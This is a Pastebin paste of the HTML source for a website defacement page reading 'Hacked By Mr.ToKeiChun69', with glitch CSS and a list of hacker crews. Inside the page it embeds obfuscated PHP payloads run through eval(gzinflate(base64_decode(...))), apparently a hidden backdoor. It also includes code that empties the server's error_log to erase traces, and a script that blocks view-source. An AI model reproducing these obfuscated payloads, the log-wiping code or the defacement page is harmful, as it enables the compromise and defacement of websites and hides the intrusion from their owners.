Ensikology

Hacked By Mr.ToKeiChun69

Mar 14th, 2019
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.80 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>Hacked By Mr.ToKeiChun69</title>
  4. <meta name="description" content="Hacked by Mr.ToKeiChun69">
  5. <style>
  6.  
  7. @import url(http://fonts.googleapis.com/css?family=Gilda+Display);
  8.  
  9. html {
  10. background: url(https://images4.alphacoders.com/589/thumb-1920-589781.jpg) no-repeat center center fixed;
  11. -webkit-background-size: cover;
  12. -moz-background-size: cover;
  13. -o-background-size: cover;
  14. background-size: cover;
  15. }
  16.  
  17. .error {
  18. text-align: center;
  19. font-family: 'Gilda Display', serif;
  20.  
  21. text-align: center;
  22. width: 100%;
  23. height: 120px;
  24. margin: auto;
  25. position: absolute;
  26. top: 0;
  27. bottom: 0;
  28. left: -60px;
  29. right: 0;
  30. -webkit-animation: noise-3 1s linear infinite;
  31. animation: noise-3 1s linear infinite;
  32. overflow: default;
  33. }
  34.  
  35. body:after {
  36. content: 'Extreme Crew';
  37. font-family: OCR-A;
  38. font-size: 100px;
  39.  
  40. text-align: center;
  41. width: 550px;
  42. margin: auto;
  43. position: absolute;
  44. top: 25%;
  45. bottom: 0;
  46. left: 0;
  47. right: 35%;
  48. opacity: 0;
  49. color: white;
  50. -webkit-animation: noise-1 .2s linear infinite;
  51. animation: noise-1 .2s linear infinite;
  52. }
  53. body:before {
  54. content: 'Extreme Crew';
  55. font-family: OCR-A;
  56. font-size: 100px;
  57.  
  58. text-align: center;
  59. width: 550px;
  60. margin: auto;
  61. position: absolute;
  62. top: 25%;
  63. bottom: 0;
  64. left: 0;
  65. right: 35%;
  66. opacity: 0;
  67. color: white;
  68. -webkit-animation: noise-2 .2s linear infinite;
  69. animation: noise-2 .2s linear infinite;
  70. }
  71.  
  72. .error {
  73. text-align: center;
  74. width: 200px;
  75. height: 60px;
  76. margin: auto;
  77. position: absolute;
  78. top: 280px;
  79. bottom: 0;
  80. left: 20px;
  81. right: 0;
  82. -webkit-animation: noise-3 1s linear infinite;
  83. animation: noise-3 1s linear infinite;
  84. }
  85.  
  86. .info:before {
  87. content: 'Mr.ToKeiChun69';
  88. font-family: OCR-A;
  89. font-size: 100px;
  90. text-align: center;
  91. width: 800px;
  92. margin: auto;
  93. position: absolute;
  94. top: 20px;
  95. bottom: 0;
  96. left: 40px;
  97. right: 100px;
  98. opacity: 0;
  99. color: white;
  100. -webkit-animation: noise-2 .2s linear infinite;
  101. animation: noise-2 .2s linear infinite;
  102. }
  103.  
  104. .info:after {
  105. content: 'Mr.ToKeiChun69';
  106. font-family: OCR-A;
  107. font-size: 100px;
  108. text-align: center;
  109. width: 800px;
  110. margin: auto;
  111. position: absolute;
  112. top: 20px;
  113. bottom: 0;
  114. left: 40px;
  115. right: 0;
  116. opacity: 0;
  117. color: white;
  118. -webkit-animation: noise-1 .2s linear infinite;
  119. animation: noise-1 .2s linear infinite;
  120. }
  121.  
  122. @-webkit-keyframes noise-1 {
  123. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  124. 10% {opacity: .1;}
  125. 50% {opacity: .5; left: -6px;}
  126. 80% {opacity: .3;}
  127. 100% {opacity: .6; left: 2px;}
  128. }
  129.  
  130. @keyframes noise-1 {
  131. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  132. 10% {opacity: .1;}
  133. 50% {opacity: .5; left: -6px;}
  134. 80% {opacity: .3;}
  135. 100% {opacity: .6; left: 2px;}
  136. }
  137.  
  138. @-webkit-keyframes noise-2 {
  139. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  140. 10% {opacity: .1;}
  141. 50% {opacity: .5; left: 6px;}
  142. 80% {opacity: .3;}
  143. 100% {opacity: .6; left: -2px;}
  144. }
  145.  
  146. @keyframes noise-2 {
  147. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  148. 10% {opacity: .1;}
  149. 50% {opacity: .5; left: 6px;}
  150. 80% {opacity: .3;}
  151. 100% {opacity: .6; left: -2px;}
  152. }
  153.  
  154. @-webkit-keyframes noise {
  155. 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  156. 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  157. 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
  158. }
  159.  
  160. @keyframes noise {
  161. 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  162. 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  163. 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
  164. }
  165.  
  166. @-webkit-keyframes noise-3 {
  167. 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  168. 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  169. 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
  170. }
  171.  
  172. @keyframes noise-3 {
  173. 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  174. 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  175. 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
  176. }
  177.  
  178. .wrap {
  179. top: 30%;
  180. left: 25%;
  181.  
  182. height: 200px;
  183.  
  184. margin-top: -100px;
  185. position: absolute;
  186. }
  187. code {
  188. color: white;
  189. }
  190. span.blue {
  191. color: #48beef;
  192. }
  193. span.comment {
  194. color: #7f8c8d;
  195. }
  196. span.orange {
  197. color: #f39c12;
  198. }
  199. span.green {
  200. color: #33cc33;
  201. }
  202.  
  203. .viewFull {
  204. font-family:OCR-A;
  205. color:orange;
  206. text-decoration:;
  207. }
  208.  
  209.  
  210. }
  211.  
  212. @media only screen and (min-height: 500px) {
  213.  
  214. .viewFull{
  215. display:none;
  216. }
  217.  
  218. }
  219. </style>
  220. <center><table height="100%" width="100%"> <td align=center>
  221. </head>
  222. <script type='text/javascript'>
  223. //<![CDATA[
  224. shortcut={all_shortcuts:{},add:function(a,b,c){var d={type:"keydown",propagate:!1,disable_in_input:!1,target:document,keycode:!1};if(c)for(var e in d)"undefined"==typeof c[e]&&(c[e]=d[e]);else c=d;d=c.target,"string"==typeof c.target&&(d=document.getElementById(c.target)),a=a.toLowerCase(),e=function(d){d=d||window.event;if(c.disable_in_input){var e;d.target?e=d.target:d.srcElement&&(e=d.srcElement),3==e.nodeType&&(e=e.parentNode);if("INPUT"==e.tagName||"TEXTAREA"==e.tagName)return}d.keyCode?code=d.keyCode:d.which&&(code=d.which),e=String.fromCharCode(code).toLowerCase(),188==code&&(e=","),190==code&&(e=".");var f=a.split("+"),g=0,h={"`":"~",1:"!",2:"@",3:"#",4:"$",5:"%",6:"^",7:"&",8:"*",9:"(",0:")","-":"_","=":"+",";":":","'":'"',",":"<",".":">","/":"?","\\":"|"},i={esc:27,escape:27,tab:9,space:32,"return":13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,"break":19,insert:45,home:36,"delete":46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123},j=!1,l=!1,m=!1,n=!1,o=!1,p=!1,q=!1,r=!1;d.ctrlKey&&(n=!0),d.shiftKey&&(l=!0),d.altKey&&(p=!0),d.metaKey&&(r=!0);for(var s=0;k=f[s],s<f.length;s++)"ctrl"==k||"control"==k?(g++,m=!0):"shift"==k?(g++,j=!0):"alt"==k?(g++,o=!0):"meta"==k?(g++,q=!0):1<k.length?i[k]==code&&g++:c.keycode?c.keycode==code&&g++:e==k?g++:h[e]&&d.shiftKey&&(e=h[e],e==k&&g++);if(g==f.length&&n==m&&l==j&&p==o&&r==q&&(b(d),!c.propagate))return d.cancelBubble=!0,d.returnValue=!1,d.stopPropagation&&(d.stopPropagation(),d.preventDefault()),!1},this.all_shortcuts[a]={callback:e,target:d,event:c.type},d.addEventListener?d.addEventListener(c.type,e,!1):d.attachEvent?d.attachEvent("on"+c.type,e):d["on"+c.type]=e},remove:function(a){var a=a.toLowerCase(),b=this.all_shortcuts[a];delete this.all_shortcuts[a];if(b){var a=b.event,c=b.target,b=b.callback;c.detachEvent?c.detachEvent("on"+a,b):c.removeEventListener?c.removeEventListener(a,b,!1):c["on"+a]=!1}}},shortcut.add("Ctrl+U",function(){top.location.href="https://www.youtube.com/watch?v=YJTujJugr2M&t=20s"});
  225. //]]><?php eval(gzinflate(base64_decode('jY9La8JAEMfvgXyHYRE2lvgolFISBG1NwYN9xNiLyLJNVnfbbBJ2J6Df3k2lYm89Dczv/5iZqkoxKzCgdYtNi+yz3e2EUdWehjDuxzC9CAplm5IfmTCmNvaMfc8hhkoLViqtMOgsF4cWujbHM3F6en+3pI5LwQthAvpUVygqHGTHRkS+h+KAI4m6jCGX3LiEyTp7Hjx0lh62Xy2vNFclTIB+i7xFza2St+PpvtsO81pTpzuwhqP0vQkQidhEoxGBIfTYKkk/knRDz5O9zJYJ3f4hafK+TlYZW6cLunWP9RphecV4KQy6TrJTh994iBq4WbzBrCiMsBYi2ICrcZ6rtOVrlrDZfJ7+9BDYkhi6S4OrX0LfIyl/VApzSUK4rgyB/Cu0H58A'))); ?>
  226. <?php eval(gzinflate(base64_decode('c0jOL6jUcFCJd/P0cQ2OVq9Qj41WL8ktiM9LzE1Vj9VBk4GIaloDAA=='))); ?>
  227. </script><?php
  228. $clean = fopen('error_log', 'w');
  229. fwrite($clean,'');
  230. fclose($clean);
  231. ?>
  232. <body><center>
  233. <table width=100% height=100%><td align=center><br>
  234. <font color="red" face="Courier">[ <marquee width="20%" behavior="alternate" scrollamount="3"><font color="grey"><> Typical Idiot Security - Extreme Crew - IndoXploit - Security Cyber Art - Hacker Patah Hati - Indonesia Silent Code - Xai Syndicate - Garooda Security Squad - CowoKerensTeam <></font></marquee> ]</font><br />
  235. <br></br>
  236. <font face="Courier New" color="cyan" size="3px">~~ Mr.DreamX196 - D4RKNE55 - 0xd3vs - ML7C - ./51N1CH1 - ./R015 - Mr.AchanX48 - Mr.BucketHead - Angel Dot Id - Ups1337 ~~</font><br/>
  237. <font face="Courier New" color="cyan" size="3px">[< Littlebear69 - L3mot_n3t - Laser69 - Gend3ruw0 - SPEEDY-03 - magelang9etar - civiliant - KATENBAD - ./RosesDie - indonesia6etar! - Mr.Luciferz - Con7ext - LCR999X - Mr.7z - AnoaGhost>]</font><br/>
  238. <br><br>ct
  239. <br></br><br></br><font size="3" color="white" face="Courier">root@x69 $ Hacked by Mr.ToKeiChun with style 69 <3 --[]~</center><br></font>
  240. <p class="text-muted">
  241.  
  242. .</p>
  243. </div>
  244.  
  245. </center>
  246. </td></table></div></center></body></html>
Add Comment
Please, Sign In to add comment